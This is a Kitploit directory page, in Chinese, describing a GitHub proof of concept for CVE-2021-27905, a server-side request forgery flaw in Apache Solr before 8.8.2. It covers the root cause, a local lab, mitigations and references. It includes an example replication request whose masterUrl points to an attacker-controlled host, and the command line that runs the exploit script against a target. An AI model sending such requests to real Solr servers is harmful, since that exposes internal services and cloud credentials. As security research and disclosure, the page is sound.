Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2021-27905 — Apache Solr < 8.8.2 服务端请求伪造 | Kitploit
工具/GitHubGitHub/rizzziom/cve-2021-27905
侦察漏洞分析漏洞利用Web应用程序漏洞利用渗透测试
GitHubrizzziom/cve-2021-27905

CVE-2021-27905

Apache Solr < 8.8.2 服务端请求伪造

查看仓库
28个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
网站

CVE-2021-27905

序号标题
1概述
2根本原因
3概念验证
4缓解措施 (8.8.2+)
5参考

仅供教育和研究目的使用。请勿在你不拥有或未经明确许可测试的系统上使用此代码。我对任何滥用行为概不负责。

概述

这是一个影响 Apache Solr(< 8.8.2)的服务器端请求伪造(SSRF)漏洞,允许远程攻击者通过复制处理器的 masterUrl 参数向内部或外部系统发起任意 HTTP 请求,从而可能暴露内部服务或敏感的云元数据。

受影响版本:所有 8.8.2 之前的版本(7.0.0 - 7.7.3, 8.0.0 - 8.8.1)

根本原因

Solr 中的复制机制允许“replica”通过指定 masterUrl 或 leaderUrl 参数从“master/leader”获取索引文件。在受影响的 Apache Solr 版本中,通过该参数指向的 URL 未经过正确验证。因此,攻击者可以诱使服务器访问其选择的远程资源。

漏洞流程

  • 攻击者会向如下端点发送请求:
root@kitploit:~
/solr/<CORE_NAME>/replication?command=fetchindex&masterUrl=http://<ATTACKER_DOMAIN>

Solr 的 ReplicationHandler 会:

  1. 接受请求。
  2. 使用提供的 masterUrl 下载索引数据。
  3. 在内部向该地址发起 HTTP 调用。

概念验证

实验室搭建

  • 可以使用 docker 在本地搭建实验环境:
root@kitploit:~
$ cd lab
$ docker compose up -d

# verify accessibility
$ curl http://127.0.0.1:8983/solr
  • 清理环境
root@kitploit:~
$ docker compose down

利用

  • 创建虚拟环境:
root@kitploit:~
# for windows
$ python -m venv <NAME>
$ .\<NAME>\Scripts\activate
# for linux
$ python3 -m venv <NAME>
$ source ./<NAME>/scripts/activate
  • 安装依赖:
root@kitploit:~
$ pip install -r requirements.txt
  • 运行 cve-2021-27905.py
root@kitploit:~
$ python3 cve-2021-27905.py --target <TARGET> --payload <SSRF_PAYLOAD>

SSRF PoC

缓解措施 (8.8.2+)

Solr ReplicationHandler 已打补丁,以:

  • 验证 masterUrl/leaderUrl 仅指向受信任的主机。
  • 限制可接受的 URL 协议(仅 http、https)。
  • 强化远程流式传输功能。
  • 建议管理员为 /replication 添加身份验证,或在未使用时彻底移除。

参考

  • https://nvd.nist.gov/vuln/detail/CVE-2021-27905
  • https://lists.apache.org/thread/90kct018gfdnvh9wh5xvt0grm9jk2l80

下载工具